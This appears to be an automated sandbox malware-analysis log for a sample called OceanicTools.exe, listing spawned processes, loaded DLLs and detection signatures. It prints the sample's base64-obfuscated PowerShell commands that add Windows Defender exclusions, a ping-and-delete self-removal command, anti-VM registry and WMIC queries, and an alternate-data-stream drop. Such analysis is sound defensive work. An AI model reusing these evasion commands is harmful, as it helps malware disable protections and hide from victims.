Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\OceanicTools.exe Process created: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe "C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe"
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Process created: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe "C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe"
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping 1.1.1.1 -n 1 -w 3000
Source: C:\Users\user\Desktop\OceanicTools.exe Process created: C:\Windows\System32\reg.exe "reg" "query" "SYSTEM\CurrentControlSet\Services\Disk\Enum" Jump to behavior
Source: C:\Users\user\Desktop\OceanicTools.exe Process created: C:\Windows\System32\wbem\WMIC.exe "wmic" "computersystem" "get" "manufacturer" Jump to behavior
Source: C:\Users\user\Desktop\OceanicTools.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" "-Command" "$cmd = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('QWRkLU1wUHJlZmVyZW5jZSAtRXhjbHVzaW9uUGF0aCAiQzpcVXNlcnNcYWxmb25zXGZvZWtzZXlya2t6eW9veHki')); Invoke-Expression $cmd" Jump to behavior
Source: C:\Users\user\Desktop\OceanicTools.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" "-Command" "$cmd = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('QWRkLU1wUHJlZmVyZW5jZSAtRXhjbHVzaW9uUGF0aCAiQzpcVXNlcnNcYWxmb25zXGZvZWtzZXlya2t6eW9veHlccWZsd2VkdGtpaHV6eXhsZy5leGUi')); Invoke-Expression $cmd" Jump to behavior
Source: C:\Users\user\Desktop\OceanicTools.exe Process created: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe "C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe" Jump to behavior
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Process created: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe "C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe" Jump to behavior
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping 1.1.1.1 -n 1 -w 3000 Jump to behavior
Source: C:\Users\user\Desktop\OceanicTools.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\OceanicTools.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\Desktop\OceanicTools.exe Section loaded: dbghelp.dll Jump to behavior
Source: C:\Users\user\Desktop\OceanicTools.exe Section loaded: dbgcore.dll Jump to behavior
Source: C:\Users\user\Desktop\OceanicTools.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\OceanicTools.exe Section loaded: textshaping.dll Jump to behavior
Source: C:\Users\user\Desktop\OceanicTools.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\OceanicTools.exe Section loaded: textinputframework.dll Jump to behavior
Source: C:\Users\user\Desktop\OceanicTools.exe Section loaded: coreuicomponents.dll Jump to behavior
Source: C:\Users\user\Desktop\OceanicTools.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\Desktop\OceanicTools.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\Desktop\OceanicTools.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\Desktop\OceanicTools.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\OceanicTools.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\OceanicTools.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\OceanicTools.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\OceanicTools.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\OceanicTools.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\OceanicTools.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: framedynos.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: msxml6.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vcruntime140.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vcruntime140_1.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vbscript.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: sxs.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Section loaded: rstrtmgr.dll Jump to behavior
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Section loaded: windowscodecs.dll Jump to behavior
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Section loaded: vaultcli.dll Jump to behavior
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\PING.EXE Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\System32\PING.EXE Section loaded: winnsi.dll Jump to behavior
Source: C:\Windows\System32\PING.EXE Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32 Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll Jump to behavior
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Jump to behavior
Source: OceanicTools.exe Static PE information: Virtual size of .text is bigger than: 0x100000
Source: OceanicTools.exe Static PE information: Image base 0x140000000 > 0x60000000
Source: OceanicTools.exe Static file information: File size 23282688 > 1048576
Source: OceanicTools.exe Static PE information: Raw size of .text is bigger than: 0x100000 < 0x11a7200
Source: OceanicTools.exe Static PE information: Raw size of .data is bigger than: 0x100000 < 0x263800
Source: OceanicTools.exe Static PE information: Raw size of .rdata is bigger than: 0x100000 < 0x16f000
Source: OceanicTools.exe Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: OceanicTools.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Data Obfuscation
barindex
Found suspicious powershell code related to unpacking or dynamic code loading
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: FromBase64String('QWRkLU1wUHJlZmVyZW5jZSAtRXhjbHVzaW9uUGF0aCAiQzpcVXNlcnNcYWxmb25zXGZvZWtzZXlya2t6eW9veHki')); Invoke-Expression $cmd@{# Script module or binary module file associated with this manife
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: FromBase64String('QWRkLU1wUHJlZmVyZW5jZSAtRXhjbHVzaW9uUGF0aCAiQzpcVXNlcnNcYWxmb25zXGZvZWtzZXlya2t6eW9veHlccWZsd2VkdGtpaHV6eXhsZy5leGUi')); Invoke-Expression $cmd@{# Script module or binary module file
Suspicious powershell command line found
Source: C:\Users\user\Desktop\OceanicTools.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" "-Command" "$cmd = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('QWRkLU1wUHJlZmVyZW5jZSAtRXhjbHVzaW9uUGF0aCAiQzpcVXNlcnNcYWxmb25zXGZvZWtzZXlya2t6eW9veHki')); Invoke-Expression $cmd"
Source: C:\Users\user\Desktop\OceanicTools.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" "-Command" "$cmd = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('QWRkLU1wUHJlZmVyZW5jZSAtRXhjbHVzaW9uUGF0aCAiQzpcVXNlcnNcYWxmb25zXGZvZWtzZXlya2t6eW9veHlccWZsd2VkdGtpaHV6eXhsZy5leGUi')); Invoke-Expression $cmd"
Source: C:\Users\user\Desktop\OceanicTools.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" "-Command" "$cmd = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('QWRkLU1wUHJlZmVyZW5jZSAtRXhjbHVzaW9uUGF0aCAiQzpcVXNlcnNcYWxmb25zXGZvZWtzZXlya2t6eW9veHki')); Invoke-Expression $cmd" Jump to behavior
Source: C:\Users\user\Desktop\OceanicTools.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" "-Command" "$cmd = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('QWRkLU1wUHJlZmVyZW5jZSAtRXhjbHVzaW9uUGF0aCAiQzpcVXNlcnNcYWxmb25zXGZvZWtzZXlya2t6eW9veHlccWZsd2VkdGtpaHV6eXhsZy5leGUi')); Invoke-Expression $cmd" Jump to behavior
Contains functionality to dynamically determine API calls
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Code function: 11_2_00007FF6350D3C70 GetCurrentProcess,NtQueryInformationProcess,GetTempPathW,wcslen,wcslen,strlen,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,wcslen,LdrLoadDll,GetProcAddress,VirtualProtect,LdrUnloadDll, 11_2_00007FF6350D3C70
PE file contains sections with non-standard names
Source: OceanicTools.exe Static PE information: section name: .buildid
Source: qflwedtkihuzyxlg.exe.0.dr Static PE information: section name: .xdata
Source: qflwedtkihuzyxlg.exe_a.dll.11.dr Static PE information: section name: .xdata
Uses code obfuscation techniques (call, push, ret)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_00007FF848DFD2A5 pushad ; iretd 5_2_00007FF848DFD2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_00007FF848F1752B push ebx; iretd 5_2_00007FF848F1756A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 9_2_00007FF848DFD2A5 pushad ; iretd 9_2_00007FF848DFD2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 9_2_00007FF848F1752B push ebx; iretd 9_2_00007FF848F1756A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 9_2_00007FF848FE19D1 push eax; iretd 9_2_00007FF848FE19F1
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Code function: 11_2_00007FF6350EAAF6 push rsp; retf 11_2_00007FF6350EAAF9
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Code function: 11_2_00007FF6350ED857 push rax; iretd 11_2_00007FF6350ED858
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Code function: 14_2_00007FF6350ED857 push rax; iretd 14_2_00007FF6350ED858
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Code function: 14_2_00007FF6350EAAF6 push rsp; retf 14_2_00007FF6350EAAF9
Drops PE files
Source: C:\Users\user\Desktop\OceanicTools.exe File created: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Jump to dropped file
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe File created: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe:a.dll Jump to dropped file
Terminates after testing mutex exists (may check infected machine status)
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe Code function: 14_2_00000001400740C0 ExitProcess,OpenMutexA,ExitProcess,CreateMutexA,CreateMutexExA,ExitProcess,ReleaseMutex,CloseHandle, 14_2_00000001400740C0

Hooking and other Techniques for Hiding and Protection
barindex
Creates files in alternative data streams (ADS)
Source: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe File created: C:\Users\user\foekseyrkkzyooxy\qflwedtkihuzyxlg.exe:a.dll Jump to behavior
Loading BitLocker PowerShell Module
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 Jump to behavior
